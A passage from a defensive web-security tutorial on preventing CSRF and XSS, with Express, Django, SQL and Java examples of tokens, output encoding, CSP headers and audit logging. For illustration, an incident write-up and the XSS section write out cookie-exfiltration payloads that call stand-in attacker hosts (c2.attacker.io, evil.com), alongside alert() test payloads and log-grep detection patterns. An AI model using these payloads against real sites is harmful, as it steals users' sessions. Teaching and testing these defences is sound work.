into every input field in your application — search boxes, form fields, URL parameters, profile fields, comment boxes. If an alert box appears showing your domain name, you have a reflected or stored XSS vulnerability at that injection point. The document.domain payload confirms you're executing on your origin, not just getting a JavaScript syntax error.

Also test event handler injection for cases where your application filters script tags: try <img src=x onerror=alert(document.domain)>, <svg onload=alert(document.domain)>, and <a href="javascript:alert(document.domain)">click</a>. Many filters block script tags but miss event handler injection.

For a more thorough automated scan, OWASP ZAP (free) and Burp Suite (professional tier) both include XSS scanners that crawl your application and test input fields systematically. These catch cases that manual testing misses, particularly in complex multi-step flows. Run them in a staging environment — aggressive scanning against production can create stored XSS test payloads that reach real users.

What is a 'Nonce' in the context of CSP?

A nonce — short for 'number used once,' though in practice it's a random string used once per request rather than a sequential number — is a cryptographically random value that your server generates fresh for each HTTP response.

You include the nonce in two places simultaneously: the CSP header (script-src 'self' 'nonce-abc123xyz') and the nonce attribute of every inline script tag you want to allow (<script nonce="abc123xyz">). The browser only executes inline scripts whose nonce attribute matches the value in the CSP header.

Because the nonce changes with every request and attackers cannot predict or retrieve it before their injection executes, injected script tags — which won't have the correct nonce — are blocked by the browser. This lets you maintain necessary inline scripts (server-rendered initialization code, state hydration) while blocking arbitrary injection, without falling back to 'unsafe-inline', which would permit everything.

Should I store CSRF tokens in cookies or server-side sessions?

Server-side sessions are the stronger choice for most applications. When the CSRF token is stored in the session (server-side), it never travels in a cookie that JavaScript can read. The session cookie itself can be HttpOnly, making the token completely inaccessible to any JavaScript — including XSS payloads. The server compares the submitted token against the session-stored value, and the token is only ever visible in the HTML of the page it's embedded in.

Cookie-based CSRF tokens (the Double Submit pattern) are pragmatic for stateless services or APIs that can't maintain server-side session state. They work because an attacker can't read cookies across origins. But they share the XSS vulnerability: if an attacker achieves XSS on your domain, they can read the non-HttpOnly CSRF cookie with document.cookie and forge both sides of the comparison.

The rule I apply: use session-stored CSRF tokens with HttpOnly, Secure, SameSite=Strict session cookies as the default. Use Double Submit only when statelessness is a genuine architectural requirement, and ensure XSS prevention is especially solid in that case, since it's the main attack vector against that pattern.
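The nonce flow from the CSP answer above can be sketched in a few lines of framework-agnostic Python. Note that render_with_nonce is a hypothetical helper name for illustration, not a real library API:

```python
import secrets

def render_with_nonce(inline_js: str) -> tuple[str, str]:
    # Fresh, unpredictable value for this response only
    nonce = secrets.token_urlsafe(16)
    # The same nonce goes in the CSP header...
    csp_header = f"script-src 'self' 'nonce-{nonce}'"
    # ...and on the one inline script tag the server intends to allow
    script_tag = f'<script nonce="{nonce}">{inline_js}</script>'
    return csp_header, script_tag

header, tag = render_with_nonce("init();")
print(header)
print(tag)
```

An injected script tag has no way to learn this value before the response is rendered, so it fails the browser's nonce check even though it sits in the same page.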

CSRF and XSS Prevention: How to Actually Secure Your Web App

📍 Part of: Security → Topic 5 of 10
CSRF and XSS prevention explained deeply — understand why these attacks work, how tokens and sanitization stop them, with real code examples and common mistakes.
⚙️ Intermediate — basic System Design knowledge assumed
In this tutorial, you'll learn
  • CSRF exploits the browser's automatic cookie attachment — CSRF tokens are the primary server-side mechanism for verifying that the user actually intended the request, not just that they have a valid session
  • XSS is categorically more dangerous than CSRF because it can read the DOM, exfiltrate tokens, bypass CSRF protection, and in its stored form affects every future visitor without requiring any interaction
  • Output encoding stops XSS injection at the HTML parsing level; CSP stops execution at the browser enforcement level — you need both, because encoding is fallible and CSP catches what slips through
✦ Plain-English analogy ✦ Real code with output ✦ Interview questions
Quick Answer
  • CSRF abuses the browser's automatic cookie attachment — the server trusts the session, not the user's intent
  • XSS injects executable scripts into your pages — the user trusts your site, and the attacker exploits that trust
  • CSRF tokens verify intent by requiring a secret the attacker's origin cannot read (same-origin policy blocks it)
  • Output encoding treats user input as data, never markup — HTML-encode before rendering to stop XSS at the source
  • CSP headers provide a second layer — even if a payload slips through encoding, the browser refuses to execute unauthorized scripts
  • Biggest mistake: assuming SameSite=Lax alone stops CSRF — it still allows cookies on top-level GET navigation from external links
🚨 START HERE
Security Vulnerability Quick Debug
Immediate actions when CSRF or XSS issues are suspected in production — start here before escalating
🟡Suspected active XSS in production
Immediate Action: Check server logs for injection pattern signatures and immediately verify whether a CSP header is present and effective. If no CSP is deployed, that is the first thing to fix — it limits ongoing damage even before you identify the injection point.
Commands
grep -r '<script\|onerror\|onload\|javascript:' /var/log/nginx/access.log | tail -50
curl -sI https://yourapp.com | grep -i content-security-policy
Fix Now: Deploy a CSP header immediately as an emergency mitigation. A restrictive policy blocks script execution and exfiltration even if the injection point hasn't been found yet: Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'. Then audit CSP violation reports (if report-uri or report-to is configured) to identify where payloads are being injected.
🟡CSRF token rejected on all POST requests after a recent deployment
Immediate Action: Recent deployments that touch session configuration, middleware ordering, or cookie settings are the most common cause of sudden universal CSRF rejection. Verify that session middleware still loads before CSRF middleware in your stack, and that no cookie domain or path settings changed that would prevent the session cookie from being sent.
Commands
curl -s -c cookies.txt -b cookies.txt https://yourapp.com/form | grep '_csrf'
curl -s -b cookies.txt -X POST -d '_csrf=BAD_TOKEN' https://yourapp.com/submit -w '%{http_code}'
Fix Now: Ensure session middleware loads before CSRF middleware — this is the most common ordering mistake in Express. Check cookie-parser initialization order. Verify that the session store (Redis, database) is reachable and not returning errors that cause silent session creation failures, which would generate new CSRF tokens on every request and make every submission look like a mismatch.
🟡HttpOnly cookie appears accessible via document.cookie in browser console
Immediate Action: Verify the Set-Cookie response header actually contains the HttpOnly flag — the most common cause is that the flag is set in one code path (login) but not another (session refresh or remember-me token generation). Check all paths that create or update session cookies.
Commands
curl -s -D - -o /dev/null -X POST -d 'user=test&pass=test' https://yourapp.com/login | grep -i set-cookie
python3 -c "import http.cookies; c=http.cookies.SimpleCookie(); c.load('session=abc; HttpOnly'); print(c['session']['httponly'])"
Fix Now: Set all session cookies with the full security triple: { httpOnly: true, secure: true, sameSite: 'strict' }. In Express this goes in the session() middleware configuration. Audit every location in your codebase that calls res.cookie() or sets a Set-Cookie header directly — any one of them missing HttpOnly is an XSS exposure for that cookie.
Production Incident: Stored XSS in User Profile Exfiltrates Admin Session Tokens
An attacker injected a stored XSS payload into their display name field, which executed silently for every admin who viewed the user management dashboard — exfiltrating 12 admin session tokens over 3 days before detection.
Symptom: The security team noticed a pattern of outbound HTTP requests from the admin dashboard to an external domain that had no business relationship with the company. Within hours, admin accounts began performing unauthorized actions: role escalations, API key generation, and bulk user data exports. The actions looked legitimate at the session level — they were coming from authenticated admin sessions — which is why automated anomaly detection didn't fire immediately.
Assumption: The engineering team believed their Django template engine automatically escaped all output, which it does — by default. The critical assumption failure was that this protection was universal. The admin dashboard had been built by a different team under a tight deadline, and one template block had been deliberately marked as safe to support a 'rich display name' feature that was later abandoned. The autoescape directive was never reverted.
Root cause: The display_name field was rendered without escaping inside a Django admin template block marked {% autoescape off %}. This directive was originally added to allow HTML formatting in display names — a feature that shipped for two weeks before being removed from the UI. The template directive was never cleaned up. The attacker set their display name to: <img src=x onerror="fetch('https://c2.attacker.io/exfil?s='+document.cookie)">. Every admin dashboard page load triggered the fetch, sending the admin's session cookie to the attacker's collection server. Because the exfiltration used a standard image load failure pattern rather than a script tag, it bypassed a naive XSS filter that was scanning for opening script tags.
Fix: Immediate response: removed {% autoescape off %} from all admin templates. Invalidated and rotated all 12 compromised admin session tokens. Blocked the attacker's collection domain at the WAF layer. Medium-term fixes: added DOMPurify sanitization on all user-generated fields at the point of input processing. Implemented a strict CSP header — Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none' — which would have blocked the fetch() exfiltration call even with the XSS payload present. Added a template audit step to the CI pipeline that flags any use of autoescape off, safe filter, or mark_safe() in templates rendering user-supplied fields.
Key Lesson
  • Never disable autoescape in templates rendering user-supplied data — if you need formatted output, use a sanitization library like DOMPurify, not raw rendering directives
  • CSP headers with a strict connect-src policy would have blocked the exfiltration fetch() call even with the XSS payload fully executing — defense in depth could have contained this incident, but CSP wasn't deployed
  • Audit every template file for autoescape off, mark_safe(), |safe filters, and equivalent raw rendering directives in your stack — make this part of your security-focused CI check
  • Stored XSS is categorically more dangerous than reflected XSS: it executes on every page load for every user who views the affected content, not just the one person who clicks a crafted link
  • XSS payloads don't require script tags — img onerror, svg onload, and a dozen other event handlers achieve the same execution. Filtering for script is not a defense.
Production Debug Guide
Symptom-driven diagnosis for web security vulnerabilities — what to check first when something looks wrong
CSRF token mismatch errors on legitimate form submissions
First, establish whether the token is being stored in the session or in a cookie — they are not interchangeable. If stored in session, verify the session middleware is initialized before the CSRF middleware in your stack (middleware-order bugs cause exactly this symptom in Express). Check that the token is being submitted as a hidden form field named correctly for your library, or as an X-CSRF-Token header for AJAX requests. Also check for load balancer configurations that route requests to different servers without shared session storage — stateful CSRF tokens require sticky sessions or a shared session backend like Redis.
User-submitted HTML renders as raw markup instead of as escaped text
Check whether output encoding is being applied at render time, not at storage time. In Django, verify that autoescape is ON in the relevant template and that no |safe filter or mark_safe() call is wrapping the field. In React, ensure you are not using dangerouslySetInnerHTML — if you are, verify that the content passed to it has been run through DOMPurify first. In server-rendered templates generally, search for any pattern that passes a user-supplied variable through a 'raw' or 'unescaped' function.
CSP header is present in responses but scripts from external CDNs still load
Open DevTools > Network, find any script request, and inspect the response headers of your HTML document — not the script itself. Look at the actual Content-Security-Policy value. Check whether script-src includes 'unsafe-inline', a wildcard (*), or overly broad domain allowances like *.cloudflare.com. Any of these effectively nullifies XSS protection. Also check whether your CSP is delivered in a meta http-equiv tag rather than an HTTP header — meta-delivered CSP cannot restrict certain directives like frame-ancestors and is less reliable across browser implementations.
SameSite cookie attribute is set in your code but the browser isn't sending it correctly
Verify the cookie is being set over HTTPS — SameSite=Strict and SameSite=Lax are not reliably enforced on non-HTTPS origins in modern browsers, and some browsers silently downgrade or ignore the attribute on HTTP. Check whether you're testing in a browser old enough to predate SameSite support (pre-Chrome 80, pre-Firefox 79). Also verify your local development environment isn't running on HTTP while production runs on HTTPS — cookie behavior differences between environments cause exactly this class of hard-to-reproduce bug.
Login redirects cause CSRF token validation failures on the next POST request
CSRF token mismatch after login is almost always a session fixation / session rotation issue. When a user logs in, the session ID must be rotated — the pre-login session token is invalid for the authenticated session. Verify that your framework's login() function rotates the session automatically (Django's does; Express requires req.session.regenerate() to be called explicitly). After rotation, the CSRF token must also be regenerated and re-injected into any forms that were already rendered with the old token.

CSRF and XSS have been fully understood since the early 2000s — and they still sit near the top of the OWASP Top 10 because developers keep underestimating them. The vulnerabilities aren't exotic. They don't require nation-state tooling or zero-day exploits. A misconfigured form, a single unescaped variable, or one missing HTTP header is all it takes.

The 2018 British Airways breach that exposed 500,000 customers' payment details was traced to injected XSS scripts that silently exfiltrated card data as customers typed it into the checkout form. The attackers were present on that page for more than two weeks before detection. CSRF has been used to hijack home router configurations, drain account balances, and post content without consent on social platforms at scale. These are not theoretical risks — they are production incidents that happened to teams who thought they had this covered.

What makes both attacks particularly dangerous in 2026 is the ecosystem complexity. Modern applications run third-party analytics scripts, CDN-hosted libraries, A/B testing frameworks, and marketing pixels. Each one is a potential injection surface. Your Content Security Policy has to account for all of it, or it accounts for none of it effectively.

This guide covers how each attack works at the HTTP level, why standard defenses actually stop them, where developers routinely create gaps in those defenses without realizing it, and what common shortcuts create a false sense of security. The goal is not a checklist — it's a mental model that lets you reason about new attack patterns as they emerge.

How CSRF Actually Works — and Why Cookies Are the Root Cause

To understand CSRF, you need to understand one browser behavior that most developers take for granted and rarely think critically about: browsers automatically attach cookies to every request made to a domain, regardless of which site triggered that request.

This is not a bug. It's by design — the mechanism that makes 'stay logged in' work across page navigations and external links. But it creates a fundamental trust problem. If you're logged into bank.com and have a session cookie, and you visit evil.com, that malicious page can fire a form POST to bank.com/transfer. Your browser will attach your bank.com session cookie to that request automatically. The bank's server sees a valid authenticated session and processes the transfer. You never interacted with the bank's site at all.

The critical observation: the attacker doesn't need to know your cookie. They don't steal it. They just need to construct a request that your browser will make for them — and the browser's cookie-attachment behavior does the rest.

The CSRF token pattern defeats this by introducing a secret value that the attacker cannot know. The token lives inside the HTML of bank.com's pages. The same-origin policy prevents evil.com from reading bank.com's page content — so the attacker cannot retrieve the token. They can forge a request, but they cannot forge a valid token. The server rejects any POST without a valid token.

The SameSite cookie attribute takes a different approach: it tells the browser not to attach the cookie on cross-site requests at all. SameSite=Strict means the cookie is never sent on any cross-site request. SameSite=Lax allows it on top-level GET navigations (clicking a link) but blocks it on cross-site POST, PUT, and DELETE requests. Neither replaces CSRF tokens for high-security operations — SameSite is browser-enforced and has compatibility nuances; CSRF tokens are server-enforced and don't rely on browser policy.

csrf_protection_express.js · JAVASCRIPT
// io.thecodeforge: Secure-by-default CSRF implementation
// Stack: Express 4.x + express-session + csurf
// Middleware order is not optional — session must initialize before CSRF

const express = require('express');
const session = require('express-session');
const cookieParser = require('cookie-parser');
const csrf = require('csurf');

const app = express();

// Body parser must come before CSRF middleware
app.use(express.urlencoded({ extended: false }));
app.use(cookieParser());

// Session middleware must initialize before CSRF middleware
// If session is unavailable, CSRF token generation fails silently in some configs
app.use(session({
  secret: process.env.SESSION_SECRET,  // Never hardcode — use env var
  resave: false,
  saveUninitialized: false,
  cookie: {
    httpOnly: true,                                          // Blocks JS access to cookie
    secure: process.env.NODE_ENV === 'production',           // HTTPS only in prod
    sameSite: 'strict',                                      // First line of CSRF defense
    maxAge: 1000 * 60 * 60 * 8                               // 8-hour session lifetime
  }
}));

// csrf({ cookie: false }) stores token in session, not a cookie
// This is more secure: token never travels in a cookie that could be read
const csrfProtection = csrf({ cookie: false });

// GET: render form with fresh CSRF token embedded as hidden field
app.get('/transfer', csrfProtection, (req, res) => {
  const csrfToken = req.csrfToken();

  // Token is embedded in HTML — evil.com cannot read it due to same-origin policy
  res.send(`
    <form method="POST" action="/transfer">
      <input type="hidden" name="_csrf" value="${csrfToken}" />
      <label>Amount: <input type="number" name="amount" min="1" /></label>
      <button type="submit">Transfer</button>
    </form>
  `);
});

// POST: csurf middleware validates _csrf field against session-stored token
// Mismatch => 403 ForbiddenError thrown automatically
app.post('/transfer', csrfProtection, (req, res) => {
  // If we reach here, the CSRF token was valid
  // Proceed with the actual transfer logic
  const { amount } = req.body;
  // ... transfer logic ...
  res.send(`Transfer of $${amount} validated and completed.`);
});

// Centralized CSRF error handler — always provide this or Express will 500
app.use((err, req, res, next) => {
  if (err.code === 'EBADCSRFTOKEN') {
    // Log this event — repeated CSRF failures from one IP is an attack signal
    console.warn(`CSRF violation: ${req.ip} -> ${req.path}`);
    return res.status(403).json({
      error: 'Invalid or missing CSRF token',
      code: 'CSRF_VIOLATION'
    });
  }
  next(err);
});

app.listen(3000, () => console.log('Server running on http://localhost:3000'));
▶ Output
Server running on http://localhost:3000
Mental Model
Why CSRF Tokens Work
The attacker can trigger cross-site requests, but they cannot read cross-site responses. The CSRF token lives in the response. An attacker who cannot read it cannot forge it.
  • Browsers auto-attach cookies to all same-domain requests regardless of which site initiated them — this is the root cause of CSRF, not a server misconfiguration
  • Same-origin policy prevents evil.com from reading bank.com's page content — the CSRF token embedded in HTML is invisible to the attacking origin
  • CSRF tokens live inside page HTML — the attacker can fire the request but cannot supply the correct token value without being able to read the page
  • SameSite=Strict blocks the cookie entirely on cross-site requests — it's a free, browser-enforced first line of defense but requires server-side tokens as the primary defense
  • Double Submit Cookie pattern works for stateless APIs: token goes in a cookie AND in the request header or body — the server compares both values. The attacker can't read the cookie, so they can't set the matching header.
  • SameSite=Lax still allows cookies on top-level GET navigations — never rely on Lax alone for state-changing operations, even if they nominally use GET
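The Double Submit comparison described above is small enough to sketch directly; the helper names here are illustrative, not a real framework API:

```python
import hmac
import secrets

def issue_csrf_token() -> str:
    # Set in a non-HttpOnly cookie at login so client JS can echo it back
    return secrets.token_urlsafe(32)

def validate_double_submit(cookie_value: str, header_value: str) -> bool:
    # Constant-time comparison of the cookie and X-CSRF-Token header values
    return hmac.compare_digest(cookie_value, header_value)

token = issue_csrf_token()
print(validate_double_submit(token, token))    # legitimate client echoed the cookie
print(validate_double_submit(token, "guess"))  # cross-origin attacker cannot read it
```

The whole guarantee rests on the second case: an attacker can cause the cookie to be sent, but cannot read its value to set a matching header.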
📊 Production Insight
CSRF tokens stored in cookies (Double Submit pattern) are a pragmatic choice for stateless APIs, but they carry a specific risk: if an XSS vulnerability exists anywhere on your domain, an attacker can read that cookie with document.cookie and forge the header to match. The Double Submit pattern's security guarantee depends entirely on the attacker being unable to read the cookie value — and XSS destroys that guarantee.
The per-session vs per-request token trade-off is real and worth understanding. Per-request tokens (a new token generated for every form, invalidated after use) provide stronger protection against certain replay scenarios but break browser back-button behavior — the back button restores the old form with an invalidated token, causing confusing 403 errors for legitimate users. Per-session tokens are the right default for most applications. Reserve per-request tokens for high-value, high-sensitivity operations like wire transfers, password changes, and account deletion.
🎯 Key Takeaway
CSRF works because browsers auto-attach cookies — not because your server is broken. Tokens defeat CSRF by requiring a value the attacker's origin cannot read, regardless of what cookies they can trigger being sent. SameSite cookies are your free first line — implement them — but never your only line. Defense in depth means both.
CSRF Defense Selection
If: Server-rendered application with session-based authentication
Use: The synchronizer token pattern — embed the token in hidden form fields and validate it on every state-changing POST/PUT/DELETE. Session middleware must load before CSRF middleware.
If: Stateless REST API with no server-side session
Use: The Double Submit Cookie pattern — generate a random token, set it in a non-HttpOnly cookie, and require the same value in an X-CSRF-Token request header. The server compares both values.
If: SPA using JWT in Authorization header (not in cookies)
Use: No CSRF defense — it does not apply, because the browser will not automatically attach the Authorization header to cross-site requests. You've traded CSRF risk for XSS risk: protect localStorage tokens carefully.
If: Mixed architecture with both server-rendered pages and API endpoints
Use: Synchronizer tokens for form submissions and an X-CSRF-Token header for AJAX requests. Expose a /csrf-token endpoint that returns a fresh token for SPA initialization.

How XSS Works — and Why Output Encoding Is Non-Negotiable

XSS happens when your application takes untrusted data and renders it in a browser context where the browser interprets it as executable HTML or JavaScript, instead of as inert plain text. The attacker doesn't break into your server. They convince your server to deliver their payload to your users on your behalf.

There are three distinct types, and understanding the difference matters for defense:

Reflected XSS: the malicious script is embedded in a URL parameter and your server reflects it back unsanitized in the response. It only affects the user who loads the crafted URL. The attack requires social engineering — the victim must click a link. Example: search?q=<script>document.location='https://evil.com/?c='+document.cookie</script>.

Stored XSS: the payload is saved to your database through a form submission — a comment, a display name, a profile bio — and then served to every user who views that content. This is categorically more dangerous because it executes on every page load without requiring the victim to click anything. One stored payload can compromise thousands of users.

DOM-based XSS: the injection happens entirely in client-side JavaScript. The server is never involved. Your own JavaScript reads from an untrusted source — URL hash, query parameters, postMessage events — and writes it to innerHTML or calls eval() on it. This variant is invisible to server-side WAFs and log analysis.

The primary defense for all three is output encoding: treating user input as data, never as markup. HTML-encode every character that could be interpreted as HTML structure before rendering it. An angle bracket becomes &lt;. A quote becomes &quot;. The browser renders the text literally instead of parsing it as HTML.

Output encoding must happen at render time, in the correct context. There are at least four distinct encoding contexts: HTML body, HTML attribute, JavaScript string, and URL. Encoding for the wrong context either doesn't protect you or double-encodes your content into garbage. Most modern template engines handle HTML body context automatically — the danger is when you opt out, or when you render into JavaScript or URL contexts without realizing it.
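Python's standard library covers three of these contexts directly. A minimal illustration (note that json.dumps alone is not sufficient when embedding JSON inside a <script> block, since it leaves '<' unescaped):

```python
import html
import json
from urllib.parse import quote

payload = '<img src=x onerror="alert(1)">'

# HTML body / attribute context: structural characters become entities
print(html.escape(payload))   # &lt;img src=x onerror=&quot;alert(1)&quot;&gt;

# URL context: reserved characters are percent-encoded
print(quote(payload, safe=""))

# JavaScript string context: a safely quoted string literal
print(json.dumps(payload))
```

Three different outputs from one input, because the browser parses each context with different rules; applying the HTML encoder to a URL context, or vice versa, is exactly the wrong-context failure described above.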

xss_prevention_django.py · PYTHON
# io.thecodeforge: XSS mitigation patterns — Django
# Three layers: template engine auto-escape, manual escape for logic contexts,
# and CSP middleware as the browser-level enforcement layer

from django.shortcuts import render
from django.utils.html import escape, format_html
from django.http import HttpResponse


def user_profile(request, username):
    """
    Renders a user profile page.

    Django templates auto-escape variables by default, so {{ username }}
    in a template is safe. The manual escape() call here is for cases where
    the value is used in Python string formatting before being passed to
    the template — for example, building a log message or an error string.

    Never use format_html() with f-strings or % formatting.
    format_html() must do the interpolation itself to apply escaping.
    """
    # Auto-escaped in templates: {{ username }} is safe without extra steps
    # Manual escape for use in Python-side string construction
    safe_username = escape(username)

    # format_html is the correct way to construct HTML strings in Python code
    # It escapes all interpolated values — unlike f-strings which do not
    profile_heading = format_html('<h1>Profile: {}</h1>', username)

    return render(request, 'profile.html', {
        'username': safe_username,
        'profile_heading': profile_heading,
    })


class ForgeCSPMiddleware:
    """
    Centralized Content Security Policy enforcement.

    Placed in middleware so every response — including error pages,
    redirects, and static file responses — gets the CSP header.

    CSP is the browser-level backstop: even if an XSS payload slips
    through encoding, a strict CSP blocks execution and exfiltration.

    Header breakdown:
      default-src 'self'     — default fallback: only load from same origin
      script-src 'self'      — no inline scripts, no external script hosts
      connect-src 'self'     — fetch/XHR can only reach same origin
                               (blocks cookie exfiltration via fetch)
      object-src 'none'      — blocks Flash, ActiveX, and plugin-based XSS
      frame-ancestors 'none' — equivalent to X-Frame-Options: DENY
    """
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        response = self.get_response(request)

        response['Content-Security-Policy'] = (
            "default-src 'self'; "
            "script-src 'self'; "
            "connect-src 'self'; "
            "object-src 'none'; "
            "frame-ancestors 'none'"
        )
        # Prevents MIME-type sniffing attacks on script/style resources
        response['X-Content-Type-Options'] = 'nosniff'
        # Belt-and-suspenders clickjacking protection alongside frame-ancestors
        response['X-Frame-Options'] = 'DENY'

        return response
▶ Output
Response headers applied: Content-Security-Policy, X-Content-Type-Options, X-Frame-Options
⚠ innerHTML Is an XSS Open Door — and It Shows Up More Than You'd Think
The most common XSS vector in modern React and Vue applications isn't in server templates — it's in JavaScript code that does element.innerHTML = userContent or React's dangerouslySetInnerHTML={{ __html: userContent }}. Developers reach for these when they need to render formatted text — markdown output, rich text editor content, localized strings with embedded HTML. The fix is not to avoid them entirely but to never pass them unsanitized content. Always run content through DOMPurify.sanitize() before assigning it to innerHTML or dangerouslySetInnerHTML. For plain text, use element.textContent instead — it cannot be interpreted as HTML regardless of what the string contains.
📊 Production Insight
Stored XSS is roughly an order of magnitude more dangerous than reflected XSS in practice — not because the payload is different, but because of reach and persistence. A reflected XSS requires the attacker to deliver a crafted URL to each victim individually. A stored XSS sitting in a popular comments section, a user bio rendered in a sidebar, or a product review displayed on a high-traffic page executes for every visitor automatically, indefinitely, until discovered and removed.
The encoding-at-render-time rule exists for a reason that isn't immediately obvious: if you HTML-encode user input before storing it in the database, you corrupt the data for every non-HTML context it's ever used in. The stored string goes into emails as &lt;script&gt;. It goes into CSV exports with HTML entities in the cells. It goes into API responses as mangled JSON strings. Store raw. Encode at render time, in the correct context for each output destination.
🎯 Key Takeaway
XSS is not a browser bug — it is your application injecting attacker code into your own pages. Output encoding stops injection at the HTML parsing level. CSP stops execution at the browser enforcement level. Use both — encoding is the seatbelt that prevents the crash; CSP is the airbag that limits damage when something gets through.

Defense Persistence: Audit Logging Security Events

Deploying CSRF tokens and output encoding is the prevention layer. Audit logging is the detection layer — and without detection, you won't know when prevention has failed until the damage is done.

Every blocked CSRF attempt should be logged. Not because the individual block matters, but because a burst of CSRF violations from a single IP or targeting a specific endpoint is an attack signal. Alone, each blocked request is noise. In aggregate, they reveal a probing pattern.

XSS detection is harder because a successful XSS payload executes in the victim's browser, not on your server. CSP violation reports (via report-uri or report-to directives) are the most practical server-side signal that an injection is occurring. Every time the browser blocks a script execution that violates your CSP, it can send a JSON report to an endpoint you control. Those reports identify the blocked resource, the violated directive, and the page where it happened — which is often enough to locate the injection point.
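A minimal parser for the report-uri style JSON body, assuming the classic application/csp-report payload shape (the newer report-to / Reporting API wraps the same information differently). The returned field names mirror this article's logging vocabulary and are otherwise arbitrary:

```python
import json

def parse_csp_report(body: bytes) -> dict:
    """Extract the fields worth logging from a report-uri style
    CSP violation report. The browser POSTs a JSON object with a
    top-level 'csp-report' key (Content-Type: application/csp-report)."""
    report = json.loads(body).get("csp-report", {})
    return {
        "event_type": "CSP_VIOLATION",
        "request_path": report.get("document-uri"),     # page where it happened
        "csp_blocked_uri": report.get("blocked-uri"),   # what the browser refused to load
        "violated_directive": report.get("violated-directive"),
    }

sample = json.dumps({"csp-report": {
    "document-uri": "https://example.com/profile/42",
    "blocked-uri": "https://evil.example/x.js",
    "violated-directive": "script-src 'self'",
}}).encode()
print(parse_csp_report(sample)["csp_blocked_uri"])  # https://evil.example/x.js
```

Those three fields are usually enough to locate the injection point, which is the whole purpose of the report endpoint.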

The schema below captures both event types in a form that supports both real-time alerting and forensic investigation. The payload_preview field is deliberately truncated — you want enough to identify the attack pattern, but you never want full credentials, tokens, or session data in your logs.

io/thecodeforge/db/security_audit.sql · SQL
-- io.thecodeforge: Security Event Tracking Schema
-- Captures CSRF violations and XSS detection events for alerting and forensics

CREATE TABLE io.thecodeforge.security_logs (
    id            SERIAL PRIMARY KEY,
    event_type    VARCHAR(50)   NOT NULL,  -- 'CSRF_BLOCKED', 'XSS_DETECTED', 'CSP_VIOLATION'
    severity      VARCHAR(10)   NOT NULL DEFAULT 'HIGH',  -- 'LOW', 'MEDIUM', 'HIGH', 'CRITICAL'
    source_ip     INET,
    user_agent    TEXT,
    request_path  TEXT,
    http_method   VARCHAR(10),
    user_id       INTEGER,                -- NULL for unauthenticated requests
    session_id    VARCHAR(64),            -- Hashed session ID for correlation, never raw
    payload_preview TEXT,                 -- Truncated at 500 chars — never log full tokens
    csp_blocked_uri TEXT,                 -- Populated for CSP_VIOLATION events
    created_at    TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP
);

-- Index for real-time alerting queries: detect burst of violations from one IP
CREATE INDEX idx_security_logs_ip_time
    ON io.thecodeforge.security_logs (source_ip, created_at DESC);

-- Index for event-type dashboards
CREATE INDEX idx_security_logs_event_type
    ON io.thecodeforge.security_logs (event_type, created_at DESC);

-- Example: log a CSRF violation
INSERT INTO io.thecodeforge.security_logs
    (event_type, severity, source_ip, request_path, http_method, payload_preview)
VALUES
    ('CSRF_BLOCKED', 'HIGH', '192.168.1.1', '/api/v1/transfer', 'POST',
     '_csrf=FORGED_TOKEN_TRUNCATED...');

-- Alert query: more than 10 CSRF violations from one IP in the last 60 seconds
-- Run this as a scheduled job or connect to PagerDuty via your SIEM
SELECT
    source_ip,
    COUNT(*) AS violation_count,
    MIN(created_at) AS first_seen,
    MAX(created_at) AS last_seen
FROM io.thecodeforge.security_logs
WHERE
    event_type = 'CSRF_BLOCKED'
    AND created_at > NOW() - INTERVAL '60 seconds'
GROUP BY source_ip
HAVING COUNT(*) > 10
ORDER BY violation_count DESC;
▶ Output
Audit log entry created. Alert query returns IPs exceeding violation threshold.
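The payload_preview column's two rules, redact anything token-shaped and truncate at 500 characters, can be sketched in Python. The helper name and the regex are hypothetical; extend the pattern list to cover whatever credential fields your application actually uses:

```python
import re

MAX_PREVIEW = 500

def payload_preview(raw: str, max_len: int = MAX_PREVIEW) -> str:
    """Redact likely secrets first, then truncate for the audit log."""
    redacted = re.sub(
        r"(?i)\b(password|token|secret|authorization|_csrf)=[^&\s]*",
        r"\1=[REDACTED]",
        raw,
    )
    if len(redacted) > max_len:
        return redacted[:max_len] + "...[truncated]"
    return redacted

print(payload_preview("_csrf=abc123&amount=500"))  # _csrf=[REDACTED]&amount=500
```

Redacting before truncating matters: truncation alone can still leave a full token in the log if it happens to sit inside the first 500 characters.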
💡Connect Logs to Alerting — Logs Alone Protect Nobody
A security log that nobody reads in real time is compliance documentation, not security infrastructure. Wire your security_logs table to a SIEM alert or a simple cron job that calls PagerDuty when CSRF_BLOCKED events exceed a threshold from a single IP within a rolling time window. The alert query in the schema above is a starting point — tune the threshold based on your normal traffic volume before it becomes noise.
📊 Production Insight
Security logs without alerting are write-only data. They protect no one in real time, and they're only useful forensically after an incident that you already know happened. The two event types worth alerting on immediately: more than 10 CSRF violations from a single IP in 60 seconds (automated attack script), and any CSP_VIOLATION event from a page that renders user-supplied content (potential active XSS injection).
CSP violation reports deserve special attention because they fire even when your encoding is correct — an attacker probing for injection points will trigger CSP violations before they find a successful bypass. Treating CSP reports as low-priority noise means ignoring the earliest warning signal you have.
🎯 Key Takeaway
Audit logs prove what happened after the fact. Alerting on those logs prevents the next thing from happening. Log the payload preview for forensics, but never log full tokens, passwords, or session IDs — your log infrastructure has a different, usually broader access control surface than your application.

Enterprise Integration: The Java Security Filter

For Java-based backends — Spring Boot services, Jakarta EE applications, legacy Servlet containers — centralized security header enforcement belongs in a Filter, not in individual controllers. Controllers are business logic. Security headers are infrastructure. Mixing them means one new endpoint written by an engineer who wasn't thinking about security ships without the headers.

A Filter runs on every request-response cycle regardless of which controller handles the request. It covers 200s, 404s, 500s, redirects, and OPTIONS preflight responses. In a microservices context, this filter belongs in a shared security library deployed as a dependency across all services — so adding a new service means inheriting the security headers automatically, not remembering to copy-paste them.

The headers below represent the minimum bar for a production Java service in 2026. They're not exhaustive — Permissions-Policy, Cross-Origin-Resource-Policy, and Cross-Origin-Opener-Policy are worth adding for high-security contexts — but these five cover the most impactful attack vectors with essentially zero performance overhead.

io/thecodeforge/security/SecurityHeaderFilter.java · JAVA
package io.thecodeforge.security;

import jakarta.servlet.Filter;
import jakarta.servlet.FilterChain;
import jakarta.servlet.FilterConfig;
import jakarta.servlet.ServletException;
import jakarta.servlet.ServletRequest;
import jakarta.servlet.ServletResponse;
import jakarta.servlet.annotation.WebFilter;
import jakarta.servlet.http.HttpServletResponse;
import java.io.IOException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
